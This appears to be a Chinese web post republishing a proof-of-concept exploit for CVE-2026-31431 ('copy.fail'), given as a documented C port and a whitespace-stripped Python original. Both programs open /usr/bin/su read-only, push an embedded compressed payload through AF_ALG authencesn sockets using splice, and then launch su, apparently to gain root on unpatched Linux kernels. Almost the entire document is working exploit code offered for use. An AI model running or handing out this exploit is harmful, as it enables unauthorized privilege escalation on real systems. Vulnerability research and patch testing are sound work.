
CVE-2026-31431 PoC(含C代码的PoC)

C代码PoC

已在 x86 机器上验证可用(页面未记录内核版本与发行版,复现结果依赖于目标内核是否已修补)。注意:该 PoC 以只读方式打开 /usr/bin/su,将其内容通过 splice 送入一个绑定了 authencesn(hmac(sha256),cbc(aes)) 的 AF_ALG AEAD 套接字,最后直接执行 su;请仅在一次性的隔离测试环境中运行。

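/*
 * C port of the copy.fail (CVE-2026-31431) Python PoC.  Linux only: it needs
 * AF_ALG (linux/if_alg.h), splice(2) and zlib.
 *
 * The listing was pasted with all whitespace stripped (which also let the
 * `//` comments swallow the code after them); this version restores it and
 * fixes two defects in the port itself:
 *   - recv() read 8+t bytes into a fixed 168-byte stack buffer, overflowing
 *     for any payload with t > 160; the buffer is now sized per call.
 *   - decompress_data() assumed a 10x inflation ratio and failed silently
 *     beyond it; it now grows the buffer on Z_BUF_ERROR (bounded).
 * The AF_ALG/splice sequence itself is unchanged.
 */
#define _GNU_SOURCE 1   /* loff_t, syscall(), MSG_MORE are not visible under a strict -std=c11 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <asm/unistd.h>
#include <linux/if_alg.h>
#include <zlib.h>

#ifndef SPLICE_F_MOVE
#define SPLICE_F_MOVE 0x01
#endif
#ifndef MSG_MORE
#define MSG_MORE 0x8000
#endif

enum {
    CHUNK_LEN   = 4,              /* payload bytes consumed per AF_ALG round (e[i:i+4]) */
    HDR_LEN     = 8,              /* b"A"*4 + chunk, sent via sendmsg before the spliced data */
    IV_LEN      = 16,             /* cbc(aes) IV, all zero */
    IV_REC_LEN  = 4 + IV_LEN,     /* struct af_alg_iv: __u32 ivlen + iv[16] -> 20 bytes */
    MAX_INFLATE = 1 << 24         /* hard cap for decompress_data(); the real payload is ~160 bytes */
};

/*
 * splice(2) via the raw syscall so the build does not depend on glibc
 * exporting splice().  Arguments and return value are those of splice(2).
 */
ssize_t my_splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags)
{
    return syscall(__NR_splice, fd_in, off_in, fd_out, off_out, len, flags);
}

/* Value of one hex digit, or -1 if `ch` is not a hex digit. */
static int hex_nibble(unsigned char ch)
{
    if (ch >= '0' && ch <= '9') return ch - '0';
    if (ch >= 'a' && ch <= 'f') return ch - 'a' + 10;
    if (ch >= 'A' && ch <= 'F') return ch - 'A' + 10;
    return -1;
}

/*
 * Decode a hex string into a freshly malloc'd byte buffer (caller frees).
 *
 * Returns NULL on odd length, any non-hex character, or allocation failure;
 * otherwise stores the byte count in *out_len.  Digits are decoded directly
 * rather than through sscanf("%2x"), which also accepted whitespace, a sign
 * and a "0x" prefix.
 */
unsigned char *hex_to_bytes(const char *hex, size_t *out_len)
{
    if (!hex || !out_len) return NULL;
    size_t len = strlen(hex);
    if (len % 2 != 0) return NULL;
    size_t n = len / 2;
    unsigned char *bytes = malloc(n ? n : 1);   /* malloc(0) may return NULL; keep "" decodable */
    if (!bytes) return NULL;
    for (size_t i = 0; i < n; i++) {
        int hi = hex_nibble((unsigned char)hex[2 * i]);
        int lo = hex_nibble((unsigned char)hex[2 * i + 1]);
        if (hi < 0 || lo < 0) {
            free(bytes);
            return NULL;
        }
        bytes[i] = (unsigned char)((hi << 4) | lo);
    }
    *out_len = n;
    return bytes;
}

/*
 * zlib-inflate `compressed` (comp_len bytes) into a malloc'd buffer (caller
 * frees); the inflated size goes to *out_len.  Returns NULL on a corrupt
 * stream, allocation failure, or if the output would exceed MAX_INFLATE.
 *
 * Starts from the original 10x guess and doubles on Z_BUF_ERROR instead of
 * failing when the guess is too small.
 */
unsigned char *decompress_data(const unsigned char *compressed, size_t comp_len, size_t *out_len)
{
    if (!compressed || !out_len || comp_len == 0 || comp_len > SIZE_MAX / 10) return NULL;
    size_t cap = comp_len * 10;
    for (;;) {
        unsigned char *buf = malloc(cap);
        if (!buf) return NULL;
        uLongf dest_len = cap;
        int rc = uncompress(buf, &dest_len, compressed, (uLong)comp_len);
        if (rc == Z_OK) {
            *out_len = dest_len;
            return buf;
        }
        free(buf);
        if (rc != Z_BUF_ERROR || cap >= MAX_INFLATE) return NULL;
        cap *= 2;
    }
}

/*
 * Append one SOL_ALG control message of `len` data bytes to `mh`.
 * `prev` is the previously appended cmsg (NULL for the first one).
 * Returns the new cmsg, or NULL if the control buffer has no room.
 */
static struct cmsghdr *put_cmsg(struct msghdr *mh, struct cmsghdr *prev, int type, const void *data, size_t len)
{
    struct cmsghdr *cm = prev ? CMSG_NXTHDR(mh, prev) : CMSG_FIRSTHDR(mh);
    if (!cm) return NULL;
    cm->cmsg_len = CMSG_LEN(len);
    cm->cmsg_level = SOL_ALG;   /* 279 in the Python PoC */
    cm->cmsg_type = type;
    memcpy(CMSG_DATA(cm), data, len);
    return cm;
}

/*
 * Mirrors the Python helper `c(f, t, c)`: one AF_ALG round.
 *
 *   f_fd   read-only fd of the target file (main() opens /usr/bin/su)
 *   t      byte offset of this chunk within the decompressed payload
 *   c_val  exactly CHUNK_LEN payload bytes
 *
 * Steps, in the same order as the Python:
 *   1. socket(AF_ALG, SOCK_SEQPACKET), bind to aead
 *      "authencesn(hmac(sha256),cbc(aes))".
 *   2. ALG_SET_KEY with an 8-byte prefix + 32 zero bytes (40 bytes);
 *      ALG_SET_AEAD_AUTHSIZE with a 4-byte zero value.
 *   3. accept() the operation socket.
 *   4. sendmsg(MSG_MORE) of the 8-byte header b"A"*4 + c with cmsgs
 *      ALG_SET_OP=ALG_OP_DECRYPT, ALG_SET_IV (ivlen 16, zero IV),
 *      ALG_SET_AEAD_ASSOCLEN=8.
 *   5. splice t+4 bytes of f_fd (from offset 0) through a pipe into the
 *      operation socket, then recv 8+t bytes.
 *
 * What the kernel does with this is the subject of the CVE; this listing by
 * itself does not show it.  Failures after bind/accept are reported on
 * stderr but do not abort the round, matching the Python's best-effort
 * behaviour (its recv is wrapped in try/except).  Every fd opened here is
 * closed on every path.
 */
void do_crypto_op(int f_fd, int t, const unsigned char *c_val)
{
    if (t < 0 || !c_val) return;   /* t is a byte offset; a negative value would wrap the sizes below */

    /* a = s.socket(38, 5, 0) -> AF_ALG, SOCK_SEQPACKET */
    int a_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (a_fd < 0) {
        perror("socket(AF_ALG)");
        return;
    }

    /* a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))")) */
    struct sockaddr_alg sa;
    memset(&sa, 0, sizeof sa);
    sa.salg_family = AF_ALG;
    snprintf((char *)sa.salg_type, sizeof sa.salg_type, "aead");
    snprintf((char *)sa.salg_name, sizeof sa.salg_name, "authencesn(hmac(sha256),cbc(aes))");
    if (bind(a_fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
        perror("bind(AF_ALG)");
        close(a_fd);
        return;
    }

    /* v(h, 1, d('0800010000000010' + '0'*64)): 8-byte prefix + 32 zero bytes = 40-byte key.
     * The prefix presumably is the authenc key header carrying the AES key length (16) — not verified here. */
    static const char key_hex[] =
        "0800010000000010"
        "0000000000000000" "0000000000000000" "0000000000000000" "0000000000000000";
    size_t key_len = 0;
    unsigned char *key = hex_to_bytes(key_hex, &key_len);
    if (key) {
        if (setsockopt(a_fd, SOL_ALG, ALG_SET_KEY, key, (socklen_t)key_len) < 0) perror("ALG_SET_KEY");
        free(key);
    }

    /* v(h, 5, None, 4): ALG_SET_AEAD_AUTHSIZE with a 4-byte zero buffer, i.e. authsize 0. */
    unsigned int authsize = 0;
    if (setsockopt(a_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, &authsize, sizeof authsize) < 0)
        perror("ALG_SET_AEAD_AUTHSIZE");

    /* u, _ = a.accept() */
    int u_fd = accept(a_fd, NULL, NULL);
    if (u_fd < 0) {
        perror("accept(AF_ALG)");
        close(a_fd);
        return;
    }

    /* Header b"A"*4 + c; ALG_SET_AEAD_ASSOCLEN = 8 covers exactly these 8 bytes. */
    unsigned char hdr[HDR_LEN];
    memset(hdr, 'A', 4);
    memcpy(hdr + 4, c_val, CHUNK_LEN);

    struct iovec iov = { .iov_base = hdr, .iov_len = sizeof hdr };
    char cbuf[CMSG_SPACE(sizeof(unsigned int)) + CMSG_SPACE(IV_REC_LEN) + CMSG_SPACE(sizeof(unsigned int))];
    memset(cbuf, 0, sizeof cbuf);
    struct msghdr mh;
    memset(&mh, 0, sizeof mh);
    mh.msg_iov = &iov;
    mh.msg_iovlen = 1;
    mh.msg_control = cbuf;
    mh.msg_controllen = sizeof cbuf;

    unsigned int op = ALG_OP_DECRYPT;          /* (h, 3, i*4): 4 zero bytes */
    unsigned char iv_rec[IV_REC_LEN] = {0};    /* (h, 2, b'\x10' + i*19): af_alg_iv{ivlen=16, iv=0..0} */
    unsigned int iv_len = IV_LEN;
    memcpy(iv_rec, &iv_len, sizeof iv_len);    /* native-endian __u32, as the struct write in the original */
    unsigned int assoclen = HDR_LEN;           /* (h, 4, b'\x08' + i*3) */

    struct cmsghdr *cm = put_cmsg(&mh, NULL, ALG_SET_OP, &op, sizeof op);
    if (cm) cm = put_cmsg(&mh, cm, ALG_SET_IV, iv_rec, sizeof iv_rec);
    if (cm) cm = put_cmsg(&mh, cm, ALG_SET_AEAD_ASSOCLEN, &assoclen, sizeof assoclen);
    if (!cm) {
        /* Cannot happen with the sizes above; kept so a later edit cannot turn it into a NULL write. */
        fprintf(stderr, "control buffer too small\n");
        close(u_fd);
        close(a_fd);
        return;
    }

    /* u.sendmsg([b"A"*4 + c], [...], 32768): 32768 == MSG_MORE, the spliced data follows. */
    if (sendmsg(u_fd, &mh, MSG_MORE) < 0) perror("sendmsg(AF_ALG)");

    /* r, w = g.pipe() */
    int pfd[2];
    if (pipe(pfd) < 0) {
        perror("pipe");
        close(u_fd);
        close(a_fd);
        return;
    }

    /* o = t + 4; n(f, w, o, offset_src=0); n(r, u.fileno(), o).
     * The Python passes flags=0; SPLICE_F_MOVE (a hint only) is kept from the original C. */
    size_t in_len = (size_t)t + CHUNK_LEN;
    loff_t off = 0;
    if (my_splice(f_fd, &off, pfd[1], NULL, in_len, SPLICE_F_MOVE) < 0) perror("splice(file->pipe)");
    if (my_splice(pfd[0], NULL, u_fd, NULL, in_len, SPLICE_F_MOVE) < 0) perror("splice(pipe->alg)");

    /* try: u.recv(8+t) except: pass.  Buffer sized per call: the original read 8+t bytes
     * into a fixed 168-byte stack array, which overflows once t > 160. */
    size_t want = (size_t)HDR_LEN + (size_t)t;
    unsigned char *out = malloc(want);
    if (out) {
        (void)recv(u_fd, out, want, 0);   /* errors deliberately ignored, as in the Python */
        free(out);
    }

    close(pfd[0]);
    close(pfd[1]);
    close(u_fd);
    close(a_fd);
}

/*
 * Entry point: open /usr/bin/su read-only, inflate the embedded payload and
 * feed it to do_crypto_op() four bytes at a time (t = byte offset), then run
 * `su`.  Exit status 1 if the file cannot be opened or the payload does not
 * decode; 0 otherwise.
 */
int main(int argc __attribute__((unused)), char *argv[] __attribute__((unused)))
{
    /* f = g.open("/usr/bin/su", 0) -> O_RDONLY */
    int f_fd = open("/usr/bin/su", O_RDONLY);
    if (f_fd < 0) {
        perror("open /usr/bin/su");
        return 1;
    }

    /* e = zlib.decompress(d(...)): the same hex blob as the Python PoC. */
    static const char compressed_hex[] =
        "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3";
    size_t comp_len = 0;
    unsigned char *compressed = hex_to_bytes(compressed_hex, &comp_len);
    if (!compressed) {
        fprintf(stderr, "payload: bad hex\n");
        close(f_fd);
        return 1;
    }
    size_t e_len = 0;
    unsigned char *e = decompress_data(compressed, comp_len, &e_len);
    free(compressed);
    if (!e) {
        fprintf(stderr, "payload: zlib decompress failed\n");
        close(f_fd);
        return 1;
    }

    /* while i < len(e): c(f, i, e[i:i+4]); i += 4
     * NOTE: the Python passes a short final slice when len(e) % 4 != 0; this port
     * zero-pads it to 4 bytes, so the two only differ for such a payload. */
    for (size_t i = 0; i < e_len; i += CHUNK_LEN) {
        unsigned char chunk[CHUNK_LEN] = {0};
        size_t remaining = e_len - i;
        memcpy(chunk, e + i, remaining < CHUNK_LEN ? remaining : CHUNK_LEN);
        do_crypto_op(f_fd, (int)i, chunk);
    }
    free(e);
    close(f_fd);

    /* g.system("su"): goes through /bin/sh with the inherited environment (PATH etc.),
     * kept as in the original; execlp("su", "su", NULL) would avoid the shell. */
    system("su");
    return 0;
}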

Python PoC

官方链接:https://copy.fail/#exploit

#!/usr/bin/env python3importosasg,zlib,socketassdefd(x):returnbytes.fromhex(x)defc(f,t,c):a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)try:u.recv(8+t)except:0f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))whilei<len(e):c(f,i,e[i:i+4]);i+=4g.system("su")
http://www.jsqmd.com/news/739153/
